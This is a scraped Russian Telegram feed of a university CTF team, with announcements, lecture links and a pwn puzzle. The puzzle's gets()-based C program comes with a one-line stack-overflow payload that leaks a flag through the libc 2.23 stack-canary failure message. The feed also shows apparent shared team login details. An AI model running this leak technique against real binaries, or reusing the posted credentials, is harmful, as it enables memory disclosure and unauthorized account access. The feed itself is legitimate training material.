MEPhI CTF
2.9K subscribers
469 photos
18 videos
10 files
466 links
Contact - @pturtle
Download Telegram
Forwarded from vbengin
Зачем вы все сюда пришли мифисты?
Forwarded from CBS Media
Знаете что бывает, если принять слишком близко к сердцу фразу "А давайте сделаем тематический контест"?

А мы ведь делаем.

#view_cbs
Загадка от Жака Фреско: можно ли получить arbitrary read и прочитать флаг с таким кодом при выключенном PIE и включенной канарейке.

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

char ptr[128] = {0};

void read_flag() {
int fd;
fd = open("flag.txt", O_RDONLY);
read(fd, ptr, 128);
close(fd);
}

int main() {
char buf[16];
read_flag();
gets(buf);
}
libc6_2.23-0ubuntu11.2_amd64
На размышление даётся 30 секунд.
Итак, решение.
В libc до версии 2.23 включительно функция stack_chk_fail, отвечающая за проверку целостности канарейки, была реализована с уязвимостью. По сути выглядело это следующим образом: при аварийном завершении программы, которое происходит при попытке реализовать переполнение буфера на стеке, stack_chk_fail выводила
*** stack smashing detected ***: ./binaryname terminated 
Aborted (core dumped)

Имя запущенной программы она брала из переменной libc_argv, которая, в свою очередь, тоже лежит на стеке, а стек, как мы помним, полностью в руках атакующего. Таким образом, атакующий мог переполнить буфер и заставить переменную libc_argv указывать не на строку, содержащую имя запущенной программы, а в любое другое место.
Эксплойт выглядит крайне просто (допустим, что значение, которое нужно слить, лежит по адресу 0x404080, как было в нашем случае):
python2 -c "print 'A'*264+'\x80\x40\x40\x00\x00\x00\x00\x00'" | ./a.out
В среду Денис Макрушин снова приглашает на открытую лекцию. В этот раз вести её будет Александр Барабанов, Principal Security Architect в команде Huawei Advanced Security Research. Тема лекции - Безопасность микросервисной архитектуры и её типовые уязвимости.

Topic: Denis Makrushin's Open Lecture
Time: Nov 18, 2020 05:55 PM Moscow

Join Zoom Meeting
https://zoom.us/j/95098133837?pwd=eHBVYzlBSkhjTlM5NXgvYmF1SldxZz09
Господа, вопрос.
Достаточно ли санитизировать < и > для полной защиты от XSS?
Это честно вопрос, я сам не знаю)
Текущий этап Кубка прекрасен. Таски агонь
Forwarded from Andrey Voronkov
Forwarded from CBS Media
— Не трогай, это под Новый год, — пожалуй, все разработчики в мире.

От обилия ивентов рябит в глазах, и жаль, что составы играющих команд далеко не резиновые: без клонирующей игроков машины в декабре будет тяжеловато.

#view_cbs
Sometimes we pull on so hard...
@thsage one love
Forwarded from Andrey Voronkov
Теперь чуть более официально.
Поздравляем Андрея Чижова, который занял 1 место в Национальном межвузовском чемпионате "Молодые профессионалы" в компетенции "Кибербезопасность", где он более чем в 2 раза превзошёл ближайшего оппонента по очкам. Решить все таски на криптографию менее чем за 10 минут - это серьезный результат.
Совет дня: если вам нужно отладить бинарник, который кучу раз форкается и выполняет много непонятных действий, но необходимо посмотреть что он делает, начиная с определенного адреса, то можно запатчить этот адрес бесконечным циклом и в последствии аттачнуться дебаггером.
А у нас для вас новая лекция.

Всем привет! Тема открытой лекции: "Уязвимости в html 2 pdf библиотеках или как я ленивого разработчика 4 раза код заставлял переписывать". Докладчик: Анатолий Катюшин
Time: Dec 9, 2020 06:00 PM Moscow

Join Zoom Meeting
https://zoom.us/j/98003279929?pwd=UGxwakFWcU1hazlMa2VGbGMvdGJ0UT09
1
Немного мемов о реальном ИБ.
Кратко: вчера FireEye (крупнейшая американская ИБ компания) заявила, что их взломала российская проправительственная группировка, похитив инструменты для проведения Red Team аудита.
Forwarded from Pavel Blinnikov
Ребят, сегодня в 22:00 начинается X-MAS CTF 2020.
Как и обещал, зарегал аккаунт для общемифишной команды. Просьба играть через него только тем, кто учится на любом курсе бакалавриата, магистратуры или аспирантуры в МИФИ. В прошлом году в общем рейтинге мы заняли 12 место, давайте в этом поднимемся еще выше.
Ссылка на чат для обсуждения:
https://t.me/joinchat/IPNOYBifMQCM6wA6vk8hsw

https://xmas.htsp.ro/
team@sprush.rocks
coolhacker
"Ты думал, что групповое избиение - это трибьют" (с)
Forwarded from #kksctf open 2020 - Info (Maxim Anfinogenov)
Tribute. Underground. Quals.
December 12th. ctftime/event/1112.

from kks with love